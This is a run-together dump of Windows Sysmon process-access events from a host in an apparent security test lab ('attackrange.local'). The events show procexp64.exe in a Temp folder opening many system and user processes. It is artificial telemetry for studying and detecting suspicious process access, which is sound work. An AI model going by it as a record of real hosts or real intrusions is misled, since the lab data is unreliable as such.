15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 